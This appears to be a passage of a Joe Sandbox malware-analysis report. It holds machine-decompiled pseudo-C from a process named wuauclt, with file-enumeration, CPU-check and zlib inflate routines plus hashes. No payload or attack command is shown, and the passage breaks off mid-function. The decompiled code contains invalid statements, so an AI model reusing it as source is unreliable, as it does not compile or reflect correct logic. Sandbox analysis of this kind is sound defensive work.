                                                				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
                                                					_t89 =  *0x273878; // 0x2
                                                					_t86 = _t89 | 0x00000001;
                                                					 *0x273878 = _t86;
                                                					goto L10;
                                                				} else {
                                                					goto L9;
                                                				}
                                                			}

                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00257BF7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-3916222277
                                                • Opcode ID: 3649732bce4eb34b4fe097e4e2fd486cc3cd2307a75267bdaf245d64d39fdbfa
                                                • Instruction ID: 610ba6ab97c1e630bc286104fe262cc8adf766caaab62d61e54fa490b8272956
                                                • Opcode Fuzzy Hash: 3649732bce4eb34b4fe097e4e2fd486cc3cd2307a75267bdaf245d64d39fdbfa
                                                • Instruction Fuzzy Hash: 3051C471D152069BEB14CF69F88A7AEBBF0FF04312F14816AE819E7250D374AA94CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E0025F89F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                				intOrPtr _v8;
                                                				signed int _v12;
                                                				intOrPtr* _v32;
                                                				CHAR* _v36;
                                                				signed int _v48;
                                                				char _v286;
                                                				signed int _v287;
                                                				struct _WIN32_FIND_DATAA _v332;
                                                				intOrPtr* _v336;
                                                				signed int _v340;
                                                				signed int _v344;
                                                				intOrPtr _v372;
                                                				void* __esi;
                                                				signed int _t35;
                                                				signed int _t40;
                                                				signed int _t43;
                                                				intOrPtr _t45;
                                                				signed char _t47;
                                                				intOrPtr* _t55;
                                                				union _FINDEX_INFO_LEVELS _t57;
                                                				signed int _t62;
                                                				signed int _t65;
                                                				void* _t72;
                                                				void* _t74;
                                                				signed int _t75;
                                                				void* _t78;
                                                				CHAR* _t79;
                                                				intOrPtr* _t83;
                                                				intOrPtr _t85;
                                                				void* _t87;
                                                				intOrPtr* _t88;
                                                				signed int _t92;
                                                				signed int _t96;
                                                				void* _t101;
                                                				intOrPtr _t102;
                                                				signed int _t105;
                                                				union _FINDEX_INFO_LEVELS _t106;
                                                				void* _t110;
                                                				void* _t111;
                                                				intOrPtr _t112;
                                                				void* _t113;
                                                				void* _t114;
                                                				signed int _t118;
                                                				void* _t119;
                                                				signed int _t120;
                                                				void* _t121;
                                                				void* _t122;
                                                
                                                				_push(__ecx);
                                                				_t83 = _a4;
                                                				_t2 = _t83 + 1; // 0x1
                                                				_t101 = _t2;
                                                				do {
                                                					_t35 =  *_t83;
                                                					_t83 = _t83 + 1;
                                                				} while (_t35 != 0);
                                                				_push(__edi);
                                                				_t105 = _a12;
                                                				_t85 = _t83 - _t101 + 1;
                                                				_v8 = _t85;
                                                				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
                                                					_push(__ebx);
                                                					_t5 = _t105 + 1; // 0x1
                                                					_t78 = _t5 + _t85;
                                                					_t111 = E0025D3BF(_t85, _t78, 1);
                                                					_t87 = _t110;
                                                					__eflags = _t105;
                                                					if(_t105 == 0) {
                                                						L6:
                                                						_push(_v8);
                                                						_t78 = _t78 - _t105;
                                                						_t40 = E002648FB(_t87, _t111 + _t105, _t78, _a4);
                                                						_t120 = _t119 + 0x10;
                                                						__eflags = _t40;
                                                						if(__eflags != 0) {
                                                							goto L9;
                                                						} else {
                                                							_t72 = E0025FADE(_a16, __eflags, _t111);
                                                							E0025D2F4(0);
                                                							_t74 = _t72;
                                                							goto L8;
                                                						}
                                                					} else {
                                                						_push(_t105);
                                                						_t75 = E002648FB(_t87, _t111, _t78, _a8);
                                                						_t120 = _t119 + 0x10;
                                                						__eflags = _t75;
                                                						if(_t75 != 0) {
                                                							L9:
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							E0025BA7F();
                                                							asm("int3");
                                                							_t118 = _t120;
                                                							_t121 = _t120 - 0x150;
                                                							_t43 =  *0x271004; // 0x80aab37c
                                                							_v48 = _t43 ^ _t118;
                                                							_t88 = _v32;
                                                							_push(_t78);
                                                							_t79 = _v36;
                                                							_push(_t111);
                                                							_t112 = _v332.cAlternateFileName;
                                                							_push(_t105);
                                                							_v372 = _t112;
                                                							while(1) {
                                                								__eflags = _t88 - _t79;
                                                								if(_t88 == _t79) {
                                                									break;
                                                								}
                                                								_t45 =  *_t88;
                                                								__eflags = _t45 - 0x2f;
                                                								if(_t45 != 0x2f) {
                                                									__eflags = _t45 - 0x5c;
                                                									if(_t45 != 0x5c) {
                                                										__eflags = _t45 - 0x3a;
                                                										if(_t45 != 0x3a) {
                                                											_t88 = E00264950(_t79, _t88);
                                                											continue;
                                                										}
                                                									}
                                                								}
                                                								break;
                                                							}
                                                							_t102 =  *_t88;
                                                							__eflags = _t102 - 0x3a;
                                                							if(_t102 != 0x3a) {
                                                								L19:
                                                								_t106 = 0;
                                                								__eflags = _t102 - 0x2f;
                                                								if(_t102 == 0x2f) {
                                                									L23:
                                                									_t47 = 1;
                                                									__eflags = 1;
                                                								} else {
                                                									__eflags = _t102 - 0x5c;
                                                									if(_t102 == 0x5c) {
                                                										goto L23;
                                                									} else {
                                                										__eflags = _t102 - 0x3a;
                                                										if(_t102 == 0x3a) {
                                                											goto L23;
                                                										} else {
                                                											_t47 = 0;
                                                										}
                                                									}
                                                								}
                                                								_t90 = _t88 - _t79 + 1;
                                                								asm("sbb eax, eax");
                                                								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
                                                								E002596C0(_t106,  &_v332, _t106, 0x140);
                                                								_t122 = _t121 + 0xc;
                                                								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
                                                								_t55 = _v336;
                                                								__eflags = _t113 - 0xffffffff;
                                                								if(_t113 != 0xffffffff) {
                                                									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                                                									__eflags = _t92;
                                                									_t93 = _t92 >> 2;
                                                									_v344 = _t92 >> 2;
                                                									do {
                                                										__eflags = _v332.cFileName - 0x2e;
                                                										if(_v332.cFileName != 0x2e) {
                                                											L36:
                                                											_push(_t55);
                                                											_t57 = E0025F89F(_t79, _t93, _t106,  &(_v332.cFileName), _t79, _v340);
                                                											_t122 = _t122 + 0x10;
                                                											__eflags = _t57;
                                                											if(_t57 != 0) {
                                                												goto L26;
                                                											} else {
                                                												goto L37;
                                                											}
                                                										} else {
                                                											_t93 = _v287;
                                                											__eflags = _t93;
                                                											if(_t93 == 0) {
                                                												goto L37;
                                                											} else {
                                                												__eflags = _t93 - 0x2e;
                                                												if(_t93 != 0x2e) {
                                                													goto L36;
                                                												} else {
                                                													__eflags = _v286;
                                                													if(_v286 == 0) {
                                                														goto L37;
                                                													} else {
                                                														goto L36;
                                                													}
                                                												}
                                                											}
                                                										}
                                                										goto L40;
                                                										L37:
                                                										_t62 = FindNextFileA(_t113,  &_v332);
                                                										__eflags = _t62;
                                                										_t55 = _v336;
                                                									} while (_t62 != 0);
                                                									_t103 =  *_t55;
                                                									_t96 = _v344;
                                                									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                                                									__eflags = _t96 - _t65;
                                                									if(_t96 != _t65) {
                                                										E002644B0(_t79, _t106, _t103 + _t96 * 4, _t65 - _t96, 4, E0025F6F7);
                                                									}
                                                								} else {
                                                									_push(_t55);
                                                									_t57 = E0025F89F(_t79, _t90, _t106, _t79, _t106, _t106);
                                                									L26:
                                                									_t106 = _t57;
                                                								}
                                                								__eflags = _t113 - 0xffffffff;
                                                								if(_t113 != 0xffffffff) {
                                                									FindClose(_t113);
                                                								}
                                                							} else {
                                                								__eflags = _t88 -  &(_t79[1]);
                                                								if(_t88 ==  &(_t79[1])) {
                                                									goto L19;
                                                								} else {
                                                									_push(_t112);
                                                									E0025F89F(_t79, _t88, 0, _t79, 0, 0);
                                                								}
                                                							}
                                                							_pop(_t114);
                                                							__eflags = _v12 ^ _t118;
                                                							return E00257097(_v12 ^ _t118, _t114);
                                                						} else {
                                                							goto L6;
                                                						}
                                                					}
                                                				} else {
                                                					_t74 = 0xc;
                                                					L8:
                                                					return _t74;
                                                				}
                                                				L40:
                                                			}

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                • Opcode ID: add486d46117c03a50e97a3461f9e70f6878f714dffc4f33e5dad22aa9430adb
                                                • Instruction ID: b2e5cc4b3bd383198311ef01b8195d2f604f023cba0bc861fe3e456441c3a2d1
                                                • Opcode Fuzzy Hash: add486d46117c03a50e97a3461f9e70f6878f714dffc4f33e5dad22aa9430adb
                                                • Instruction Fuzzy Hash: F731247282024ABFCB649E78CD88EFA7BBDDF85305F1001A8FC5897251E6319E58CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E002517C0() {
                                                				signed int* _t453;
                                                				signed int _t455;
                                                				intOrPtr _t457;
                                                				signed int _t458;
                                                				signed int _t459;
                                                				signed int* _t468;
                                                				signed int _t470;
                                                				signed int _t472;
                                                				signed int _t504;
                                                				void* _t510;
                                                
                                                				_t453 =  *(_t510 + 0x38);
                                                				_t468 =  *(_t510 + 0x38);
                                                				_t504 = _t468[7];
                                                				 *(_t510 + 8) =  *_t453;
                                                				_t470 = _t468[0xd];
                                                				 *(_t510 + 0x10) = _t468[8];
                                                				_t455 = _t468[0xc];
                                                				 *(_t510 + 0x14) = _t453[1];
                                                				 *(_t510 + 0x44) = _t470;
                                                				if(_t470 >= _t455) {
                                                					_t457 = _t468[0xb] - _t470;
                                                				} else {
                                                					_t457 = _t455 - _t470 - 1;
                                                				}
                                                				 *((intOrPtr*)(_t510 + 0x1c)) = _t457;
                                                				while(1) {
                                                					L4:
                                                					_t458 =  *_t468;
                                                					if(_t458 > 9) {
                                                						break;
                                                					}
                                                					switch( *((intOrPtr*)(_t458 * 4 +  &M00252490))) {
                                                						case 0:
                                                							_t500 =  *(_t510 + 0x18);
                                                							if(_t504 >= 3) {
                                                								goto L12;
                                                							} else {
                                                								_t464 =  *(_t510 + 0x14);
                                                								_t495 =  *(_t510 + 0x10);
                                                								while(_t464 != 0) {
                                                									_t464 = _t464 - 1;
                                                									 *(_t510 + 0x4c) = 0;
                                                									_t491 = 0 << _t504;
                                                									_t504 = 8 + _t504;
                                                									 *(_t510 + 0x14) = _t464;
                                                									_t500 = _t500 | _t491;
                                                									_t495 = _t495 + 1;
                                                									 *(_t510 + 0x18) = _t500;
                                                									 *(_t510 + 0x10) = _t495;
                                                									if(_t504 < 3) {
                                                										continue;
                                                									} else {
                                                										L12:
                                                										_t462 = _t500 & 0x00000007;
                                                										_t463 = _t462 >> 1;
                                                										_t468[6] = _t462 & 0x00000001;
                                                										if(_t463 > 3) {
                                                											goto L4;
                                                										} else {
                                                											switch( *((intOrPtr*)(_t463 * 4 +  &M002524B8))) {
                                                												case 0:
                                                													goto L14;
                                                												case 1:
                                                													goto L15;
                                                												case 2:
                                                													goto L17;
                                                												case 3:
                                                													goto L100;
                                                											}
                                                										}
                                                									}
                                                									goto L127;
                                                								}
                                                								_t465 =  *(_t510 + 0x48);
                                                								_t468[8] = _t500;
                                                								_t468[7] = _t504;
                                                								 *(4 + _t465) = 0;
                                                								 *((intOrPtr*)(8 + _t465)) =  *((intOrPtr*)(8 + _t465)) + _t495 -  *_t465;
                                                								 *_t465 = _t495;
                                                								_t468[0xd] =  *(_t510 + 0x44);
                                                								return E002535B0(_t468, _t465,  *(_t510 + 0x4c));
                                                							}
                                                							goto L127;
                                                						case 1:
                                                							__esi =  *(__esp + 0x18);
                                                							__edi =  *(__esp + 0x14);
                                                							__eax =  *(__esp + 0x10);
                                                							if(__ebp >= 0x20) {
                                                								L21:
                                                								__edx = __esi;
                                                								__ecx = __esi;
                                                								__edx =  !__esi;
                                                								__ecx = __esi & 0x0000ffff;
                                                								 !__esi >> 0x10 =  !__esi >> 0x00000010 ^ __ecx;
                                                								if(( !__esi >> 0x00000010 ^ __ecx) != 0) {
                                                									__ecx =  *(__esp + 0x48);
                                                									 *__ebx = 9;
                                                									__edx = __eax;
                                                									 *(__ecx + 0x18) = "invalid stored block lengths";
                                                									__ebx[8] = __esi;
                                                									__ebx[7] = __ebp;
                                                									__esi =  *__ecx;
                                                									__ebp =  *(8 + __ecx);
                                                									__edx = __eax -  *__ecx;
                                                									__ebp = __eax -  *__ecx +  *(8 + __ecx);
                                                									 *__ecx = __eax;
                                                									__eax =  *(__esp + 0x48);
                                                									 *(4 + __ecx) = __edi;
                                                									 *(8 + __ecx) = __ebp;
                                                									__ebx[0xd] =  *(__esp + 0x48);
                                                									__eax = E002535B0(__ebx, __ecx, 0xfffffffd);
                                                									_pop(__edi);
                                                									_pop(__esi);
                                                									return __eax;
                                                								} else {
                                                									__ebp = 0;
                                                									__eax = __ecx;
                                                									__ebx[1] = __ecx;
                                                									 *(__esp + 0x18) = 0;
                                                									if(__ecx == 0) {
                                                										goto L48;
                                                									} else {
                                                										__eax = 2;
                                                										 *__ebx = 2;
                                                									}
                                                									goto L4;
                                                								}
                                                							} else {
                                                								while(1) {
                                                									__edx = 0;
                                                									if(__edi == 0) {
                                                										break;
                                                									}
                                                									__ecx = 0;
                                                									 *(__esp + 0x4c) = 0;
                                                									__cl =  *__eax;
                                                									__edi = __edi - 1;
                                                									__edx = 0;
                                                									__ecx = __ebp;
                                                									__edx = 0 << __cl;
                                                									__ebp = 8 + __ebp;
                                                									 *(__esp + 0x14) = __edi;
                                                									__esi = __esi | 0 << __cl;
                                                									__eax = __eax + 1;
                                                									 *(__esp + 0x10) = __eax;
                                                									if(__ebp < 0x20) {
                                                										continue;
                                                									} else {
                                                										goto L21;
                                                									}
                                                									goto L127;
                                                								}
                                                								__ecx =  *(__esp + 0x48);
                                                								__ebx[8] = __esi;
                                                								__ebx[7] = __ebp;
                                                								__esi =  *__ecx;
                                                								__ebp =  *(8 + __ecx);
                                                								 *(4 + __ecx) = 0;
                                                								__edx = __eax;
                                                								__edx = __eax -  *__ecx;
                                                								 *__ecx = __eax;
                                                								__eax =  *(__esp + 0x44);
                                                								__ebp = __edx +  *(8 + __ecx);
                                                								__edx =  *(__esp + 0x4c);
                                                								 *(8 + __ecx) = __ebp;
                                                								__ebx[0xd] =  *(__esp + 0x44);
                                                								__eax = E002535B0(__ebx, __ecx,  *(__esp + 0x4c));
                                                								_pop(__edi);
                                                								_pop(__esi);
                                                								return __eax;
                                                							}
                                                							goto L127;
                                                						case 2:
                                                							__edi =  *(__esp + 0x14);
                                                							if(__edi == 0) {
                                                								__ecx =  *(__esp + 0x18);
                                                								__eax =  *(__esp + 0x48);
                                                								__ebx[8] =  *(__esp + 0x18);
                                                								__ecx =  *(__esp + 0x10);
                                                								__ebx[7] = __ebp;
                                                								__esi =  *__eax;
                                                								__ebp =  *(__eax + 8);
                                                								__edx = __ecx;
                                                								__edx = __ecx -  *__eax;
                                                								 *__eax = __ecx;
                                                								__ecx =  *(__esp + 0x44);
                                                								__ebp = __edx +  *(__eax + 8);
                                                								__edx =  *(__esp + 0x4c);
                                                								 *(__eax + 4) = 0;
                                                								 *(__eax + 8) = __ebp;
                                                								__ebx[0xd] =  *(__esp + 0x44);
                                                								__eax = E002535B0(__ebx, __eax,  *(__esp + 0x4c));
                                                								_pop(__edi);
                                                								_pop(__esi);
                                                								return __eax;
                                                							} else {
                                                								__ecx =  *(__esp + 0x1c);
                                                								if(__ecx != 0) {
                                                									L43:
                                                									__eax = __ebx[1];
                                                									 *(__esp + 0x4c) = 0;
                                                									if(__eax > __edi) {
                                                										__eax = __edi;
                                                									}
                                                									if(__eax > __ecx) {
                                                										__eax = __ecx;
                                                									}
                                                									__esi =  *(__esp + 0x10);
                                                									__edi =  *(__esp + 0x44);
                                                									__ecx = __eax;
                                                									__edx = __ecx;
                                                									__ecx = __ecx >> 2;
                                                									__eax = memcpy( *(__esp + 0x44), __esi, __ecx << 2);
                                                									__edi = __esi + __ecx;
                                                									__edi = __esi + __ecx + __ecx;
                                                									__ecx = 0;
                                                									__ecx = __edx;
                                                									__edx =  *(__esp + 0x1c);
                                                									__ecx = __ecx & 0x00000003;
                                                									__edx =  *(__esp + 0x1c) - __eax;
                                                									__eax = memcpy(__edi, __esi, __ecx);
                                                									__esi + __ecx = __esi + __ecx + __ecx;
                                                									0 =  *(__esp + 0x10);
                                                									__edi =  *(__esp + 0x14);
                                                									__esi =  *(__esp + 0x44);
                                                									__ecx = __eax +  *(__esp + 0x10);
                                                									 *(__esp + 0x10) = __eax +  *(__esp + 0x10);
                                                									__ecx = __ebx[1];
                                                									__edi =  *(__esp + 0x14) - __eax;
                                                									__esi =  *(__esp + 0x44) + __eax;
                                                									__ecx = __ebx[1] - __eax;
                                                									 *(__esp + 0x14) = __edi;
                                                									 *(__esp + 0x44) = __esi;
                                                									 *(__esp + 0x1c) = __edx;
                                                									__ebx[1] = __ecx;
                                                									if(__ecx == 0) {
                                                										L48:
                                                										__ebx[6] =  ~(__ebx[6]);
                                                										asm("sbb eax, eax");
                                                										__eax =  ~(__ebx[6]) & 0x00000007;
                                                										 *__ebx =  ~(__ebx[6]) & 0x00000007;
                                                									}
                                                									goto L4;
                                                								} else {
                                                									__ecx = __ebx[0xb];
                                                									__edx =  *(__esp + 0x44);
                                                									if(__edx != __ecx) {
                                                										L32:
                                                										__eax =  *(__esp + 0x4c);
                                                										__edi =  *(__esp + 0x48);
                                                										__ebx[0xd] = __edx;
                                                										__eax = E002535B0(__ebx, __edi,  *(__esp + 0x4c));
                                                										__edx = __ebx[0xd];
                                                										__esi = __ebx[0xc];
                                                										 *(__esp + 0x4c) = __eax;
                                                										 *(__esp + 0x44) = __edx;
                                                										if(__edx >= __esi) {
                                                											__ecx = __ebx[0xb];
                                                											__ecx = __ebx[0xb] - __edx;
                                                										} else {
                                                											__esi = __esi - __edx;
                                                											__ecx = __esi - __edx - 1;
                                                										}
                                                										__eax = __ebx[0xb];
                                                										 *(__esp + 0x1c) = __ecx;
                                                										 *(__esp + 0x20) = __eax;
                                                										if(__edx == __eax) {
                                                											__eax = __ebx[0xa];
                                                											if(__esi != __eax) {
                                                												__edx = __eax;
                                                												 *(__esp + 0x44) = __edx;
                                                												if(__edx >= __esi) {
                                                													__ecx =  *(__esp + 0x20);
                                                													__ecx =  *(__esp + 0x20) - __edx;
                                                												} else {
                                                													__esi = __esi - __edx;
                                                													__ecx = __esi;
                                                												}
                                                												 *(__esp + 0x1c) = __ecx;
                                                											}
                                                										}
                                                										if(__ecx == 0) {
                                                											__eax =  *(__esp + 0x18);
                                                											__ecx =  *(__esp + 0x14);
                                                											__ebx[8] =  *(__esp + 0x18);
                                                											__eax =  *(__esp + 0x10);
                                                											__ebx[7] = __ebp;
                                                											__ebp =  *__edi;
                                                											__esi =  *(__edi + 8);
                                                											 *(__edi + 4) =  *(__esp + 0x14);
                                                											__ecx = __eax;
                                                											 *__edi = __eax;
                                                											__ecx = __eax -  *__edi;
                                                											__esi =  *(__edi + 8) + __eax -  *__edi;
                                                											 *(__edi + 8) =  *(__edi + 8) + __eax -  *__edi;
                                                											__ebx[0xd] = __edx;
                                                											__edx =  *(__esp + 0x4c);
                                                											__eax = E002535B0(__ebx, __edi,  *(__esp + 0x4c));
                                                											_pop(__edi);
                                                											_pop(__esi);
                                                											return __eax;
                                                										} else {
                                                											__edi =  *(__esp + 0x14);
                                                											goto L43;
                                                										}
                                                									} else {
                                                										__eax = __ebx[0xc];
                                                										__esi = __ebx[0xa];
                                                										if(__eax == __esi) {
                                                											goto L32;
                                                										} else {
                                                											__edx = __esi;
                                                											 *(__esp + 0x44) = __edx;
                                                											if(__edx >= __eax) {
                                                												__ecx = __ecx - __edx;
                                                											} else {
                                                												__eax = __eax - __edx;
                                                												__ecx = __eax;
                                                											}
                                                											 *(__esp + 0x1c) = __ecx;
                                                											if(__ecx != 0) {
                                                												goto L43;
                                                											} else {
                                                												goto L32;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                							goto L127;
                                                						case 3:
                                                							__edi =  *(__esp + 0x18);
                                                							if(__ebp >= 0xe) {
                                                								L53:
                                                								__eax = __edi;
                                                								__eax = __edi & 0x00003fff;
                                                								__ecx = __eax;
                                                								__ebx[1] = __eax;
                                                								__ecx = __eax & 0x0000001f;
                                                								if(__ecx > 0x1d) {
                                                									L107:
                                                									__eax =  *(__esp + 0x48);
                                                									__ecx =  *(__esp + 0x14);
                                                									 *__ebx = 9;
                                                									 *(__eax + 0x18) = "too many length or distance symbols";
                                                									__ebx[8] = __edi;
                                                									__ebx[7] = __ebp;
                                                									__esi =  *__eax;
                                                									__ebp =  *(__eax + 8);
                                                									 *(__eax + 4) =  *(__esp + 0x14);
                                                									__ecx =  *(__esp + 0x14);
                                                									__edx = __ecx;
                                                									 *__eax = __ecx;
                                                									__ecx =  *(__esp + 0x4c);
                                                									__edx = __edx -  *__eax;
                                                									__ebp = __edx +  *(__eax + 8);
                                                									 *(__eax + 8) = __edx +  *(__eax + 8);
                                                									__ebx[0xd] =  *(__esp + 0x4c);
                                                									__eax = E002535B0(__ebx, __eax, 0xfffffffd);
                                                									_pop(__edi);
                                                									_pop(__esi);
                                                									return __eax;
                                                								} else {
                                                									__eax = __eax & 0x000003e0;
                                                									if((__eax & 0x000003e0) > 0x3a0) {
                                                										goto L107;
                                                									} else {
                                                										__esi =  *(__esp + 0x48);
                                                										_push(4);
                                                										__eax = __eax >> 5;
                                                										__eax = __eax & 0x0000001f;
                                                										__eax = __eax + __ecx + 0x102;
                                                										__ecx =  *(__esi + 0x28);
                                                										_push(__eax);
                                                										_push( *(__esi + 0x28));
                                                										__eax =  *((intOrPtr*)(__esi + 0x20))();
                                                										__esp = __esp + 0xc;
                                                										__ebx[3] = __eax;
                                                										if(__eax == 0) {
                                                											__eax =  *(__esp + 0x14);
                                                											__ebx[8] = __edi;
                                                											__ebx[7] = __ebp;
                                                											__edi =  *__esi;
                                                											__edx =  *(__esi + 8);
                                                											 *(__esi + 4) =  *(__esp + 0x14);
                                                											__eax =  *(__esp + 0x10);
                                                											__eax = __eax -  *__esi;
                                                											 *__esi = __eax;
                                                											__edx =  *(__esi + 8) + __eax -  *__esi;
                                                											 *(__esi + 8) =  *(__esi + 8) + __eax -  *__esi;
                                                											__edx =  *(__esp + 0x50);
                                                											__ebx[0xd] =  *(__esp + 0x50);
                                                											__eax = E002535B0(__ebx, __esi, 0xfffffffc);
                                                											_pop(__edi);
                                                											_pop(__esi);
                                                											return __eax;
                                                										} else {
                                                											__edi = __edi >> 0xe;
                                                											__ebp = __ebp - 0xe;
                                                											__ebx[2] = 0;
                                                											 *__ebx = 4;
                                                											goto L58;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								__esi =  *(__esp + 0x14);
                                                								__eax =  *(__esp + 0x10);
                                                								while(__esi != 0) {
                                                									__ecx = 0;
                                                									__esi = __esi - 1;
                                                									__cl =  *__eax;
                                                									 *(__esp + 0x4c) = 0;
                                                									__edx = 0;
                                                									__ecx = __ebp;
                                                									__edx = 0 << __cl;
                                                									__ebp = 8 + __ebp;
                                                									 *(__esp + 0x14) = __esi;
                                                									__edi = __edi | 0 << __cl;
                                                									__eax = __eax + 1;
                                                									 *(__esp + 0x10) = __eax;
                                                									if(__ebp < 0xe) {
                                                										continue;
                                                									} else {
                                                										goto L53;
                                                									}
                                                									goto L127;
                                                								}
                                                								__eax =  *(__esp + 0x48);
                                                								__ecx =  *(__esp + 0x10);
                                                								__ebx[8] = __edi;
                                                								__ebx[7] = __ebp;
                                                								__esi =  *__eax;
                                                								__ebp =  *(__eax + 8);
                                                								__edx = __ecx;
                                                								 *__eax = __ecx;
                                                								__ecx =  *(__esp + 0x44);
                                                								__ebp = __edx +  *(__eax + 8);
                                                								__edx =  *(__esp + 0x4c);
                                                								 *(__eax + 4) = 0;
                                                								 *(__eax + 8) = __ebp;
                                                								__ebx[0xd] =  *(__esp + 0x44);
                                                								__eax = E002535B0(__ebx, __eax,  *(__esp + 0x4c));
                                                								_pop(__edi);
                                                								_pop(__esi);
                                                								return __eax;
                                                							}
                                                							goto L127;
                                                						case 4:
                                                							__edi =  *(__esp + 0x18);
                                                							__esi =  *(__esp + 0x48);
                                                							L58:
                                                							__edx = __ebx[1];
                                                							__eax = __ebx[2];
                                                							__ebx[1] >> 0xa = 4 + (__ebx[1] >> 0xa);
                                                							if(__ebx[2] >= 4 + (__ebx[1] >> 0xa)) {
                                                								L64:
                                                								__ecx = __ebx[2];
                                                								__eax = 0x13;
                                                								if(__ebx[2] < 0x13) {
                                                									do {
                                                										__ecx = __ebx[2];
                                                										__edx =  *(0x2692f4 + __ebx[2] * 4);
                                                										__ecx = __ebx[3];
                                                										 *(__ebx[3] +  *(0x2692f4 + __ebx[2] * 4) * 4) = 0;
                                                										__edx = __ebx[2];
                                                										__edx = __ebx[2] + 1;
                                                										__ecx = __edx;
                                                										__ebx[2] = __edx;
                                                									} while (__edx < 0x13);
                                                								}
                                                								__edx = __ebx[9];
                                                								__ecx =  &(__ebx[5]);
                                                								__eax =  &(__ebx[4]);
                                                								__edx = __ebx[3];
                                                								__ebx[4] = 7;
                                                								__eax = E00252E80(__ebx[3],  &(__ebx[4]),  &(__ebx[5]), __ebx[9], __esi);
                                                								 *(__esp + 0x18) = __eax;
                                                								if(__eax != 0) {
                                                									if( *(__esp + 0x18) == 0xfffffffd) {
                                                										__edx = __ebx[3];
                                                										__eax =  *(__esi + 0x28);
                                                										_push(__ebx[3]);
                                                										_push( *(__esi + 0x28));
                                                										__eax =  *((intOrPtr*)(__esi + 0x24))();
                                                										__esp = __esp + 8;
                                                										 *__ebx = 9;
                                                									}
                                                									__eax =  *(__esp + 0x10);
                                                									__ecx =  *(__esp + 0x14);
                                                									__ebx[8] = __edi;
                                                									__ebx[7] = __ebp;
                                                									__edi =  *__esi;
                                                									__edx = __eax;
                                                									 *(__esi + 4) =  *(__esp + 0x14);
                                                									__ecx =  *(__esi + 8);
                                                									__edx = __eax -  *__esi;
                                                									 *__esi = __eax;
                                                									__eax =  *(__esp + 0x44);
                                                									__ecx =  *(__esi + 8) + __edx;
                                                									 *(__esi + 8) =  *(__esi + 8) + __edx;
                                                									__ecx =  *(__esp + 0x18);
                                                									__ebx[0xd] =  *(__esp + 0x44);
                                                									__eax = E002535B0(__ebx, __esi,  *(__esp + 0x18));
                                                									_pop(__edi);
                                                									_pop(__esi);
                                                									return __eax;
                                                								} else {
                                                									__ebx[2] = __eax;
                                                									 *__ebx = 5;
                                                									goto L69;
                                                								}
                                                							} else {
                                                								do {
                                                									if(__ebp >= 3) {
                                                										goto L63;
                                                									} else {
                                                										__eax =  *(__esp + 0x10);
                                                										while(1) {
                                                											__ecx =  *(__esp + 0x14);
                                                											if(__ecx == 0) {
                                                												goto L111;
                                                											}
                                                											__edx = __ecx;
                                                											__ecx = 0;
                                                											__cl =  *__eax;
                                                											 *(__esp + 0x14) = __edx;
                                                											__edx = 0;
                                                											__ecx = __ebp;
                                                											__ebp = 8 + __ebp;
                                                											__edx = 0 << __cl;
                                                											 *(__esp + 0x4c) = 0;
                                                											__edi = __edi | 0 << __cl;
                                                											__eax = __eax + 1;
                                                											 *(__esp + 0x10) = __eax;
                                                											if(__ebp < 3) {
                                                												continue;
                                                											} else {
                                                												goto L63;
                                                											}
                                                											goto L127;
                                                										}
                                                										goto L111;
                                                									}
                                                									goto L127;
                                                									L63:
                                                									__ecx = __ebx[2];
                                                									__eax = __edi;
                                                									__eax = __edi & 0x00000007;
                                                									__ebp = __ebp - 3;
                                                									__edx =  *(0x2692f4 + __ebx[2] * 4);
                                                									__ecx = __ebx[3];
                                                									__edi = __edi >> 3;
                                                									 *(__ebx[3] +  *(0x2692f4 + __ebx[2] * 4) * 4) = __eax;
                                                									__edx = __ebx[2];
                                                									__edx = __ebx[2] + 1;
                                                									__ebx[2] = __edx;
                                                									__eax = __edx;
                                                									__ebx[1] = __ebx[1] >> 0xa;
                                                									__edx = 4 + (__ebx[1] >> 0xa);
                                                								} while (__eax < 4 + (__ebx[1] >> 0xa));
                                                								goto L64;
                                                							}
                                                							goto L127;
                                                						case 5:
                                                							__edi =  *(__esp + 0x18);
                                                							__esi =  *(__esp + 0x48);
                                                							L69:
